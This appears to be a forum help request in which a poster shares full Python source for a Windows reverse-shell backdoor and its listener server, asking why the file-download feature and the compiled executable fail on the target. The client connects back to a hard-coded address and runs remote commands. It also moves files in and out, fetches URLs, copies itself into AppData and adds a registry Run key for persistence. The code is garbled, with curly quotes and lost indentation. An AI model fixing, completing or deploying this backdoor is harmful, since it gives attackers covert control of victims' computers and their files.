I was wondering anyone could shed some light on my issue. My download doesn’t seem to work for my back door. is there something obvious which I should look for ? Also now when I compile the executable it wont run on the target machine . it complies fine. but it just then says there is an error ? Any help appreciated.
#!/usr/bin/python
import socket
import subprocess
import json
import time
import os
import shutil
import sys
import base64
import requests
#reliable_send is the function which allows us to use as much data as we want in the connection.
def reliable_send(data):
json_data = json.dumps(data)
sock.send(json_data)
#reliable_recv doesnt have to be specific to anything as we are the ones recieveing the data.
def reliable_recv():
json_data = “”
#while true is an infinate loop
while True:
try:
json_data = json_data + sock.recv(1024)
return json.loads(json_data)
#if we get the value error retunr this means the data was larger than 1024 bytes and it needs to go back to the start of the loop. An$
except ValueError:
continue
def download(url):
get_response = requests.get(url)
file_name = url.split("/")[-1]
with open(file_name, “wb”) as out_file:
out_file.write(get_response.content)
def connection():
while True:
time.sleep(20)
try:
sock.connect((“192.168.11.141”,54321))
shell()
except:
connection()
def shell():
while True:
command = reliable_recv()
if command == “q”:
break
elif command[:2] == “cd” and len(command) > 1:
try:
os.chdir(command[3:])
except:
continue
elif command[:8] == “download”:
with open(command[9:], “rb”) as file:
reliable_send(base64.encode(file.read()))
elif command[:6] == “upload”:
with open(command[7:], “wb”) as fin:
result = reliable_recv()
fin.write(base64.b64decode(result))
elif command[:3] == “get”:
try:
download(command[4:])
reliable_send("[+] Download File From Specified URL !")
except:
reliable_send("[!!] Failed To Download File")
else:
try:
proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
result = proc.stdout.read() + proc.stderr.read()
reliable_send(result)
except:
reliable_send("[!!] Cant Execute That command")
#try and except rules are giving the code instructions for when something wone wotk. so it know what to do when something wont work.
location = os.environ[“appdata”] + “\reverse_shell.exe”
if not os.path.exists(location):
shutil.copyfile(sys.executable, location)
subprocess.call(‘reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v reverse_shell /t REG_SZ /d "’ + location +’"’, shell=True)
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connection()
sock.close()
Any information offered would be greeatly appreciated.
This is the server code.
#!/usr/bin/python
import socket
#json is the libary to make the machine dump as much data as it can.
import json
import base64
#reliable_send is the function which allows us to use as much data as we want in the connection.
def reliable_send(data):
json_data = json.dumps(data)
target.send(json_data)
#reliable_recv doesnt have to be specific to anything as we are the ones recieveing the data.
def reliable_recv():
json_data = “”
#while true is an infinate loop
while True:
try:
json_data = json_data + target.recv(1024)
return json.loads(json_data)
#if we get the value error retunr this means the data was larger than 1024 bytes and it needs to go back to the start of the loop. And it will add it to the json_data variable . And it will continue to do this as long as there are bytes to recieve.
except ValueError:
continue
#def shell is the function to call the shell.
def shell():
while True:
command = raw_input("* Shell#-%s: " % str(ip))
reliable_send(command)
if command == “q”:
break
elif command[:2] == "cd" and len(command) > 1:
continue
elif command[:8] == "download":
with open(command[9:], "wb") as file:
result = reliable_recv()
file.write(base64.b64decode(result))
elif command[:6] == "upload":
try:
with open(command[7:], "rb") as fin:
reliable_send(base64.b64encode(fin.read()))
except:
failed = "Failed to Upload"
reliable_send(base64.b64encode(failed))
else:
result = reliable_recv()
print(result)
def server():
#The global command makes the varibale avaliabe for use anywhere in the code
global s
global ip
global target
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR, 1)
s.bind((“192.168.11.141”,54321))
s.listen(5)
print (“Listening for Incoming connections”)
target, ip = s.accept()
print(“Target Connected!”)
server()
shell()
s.close()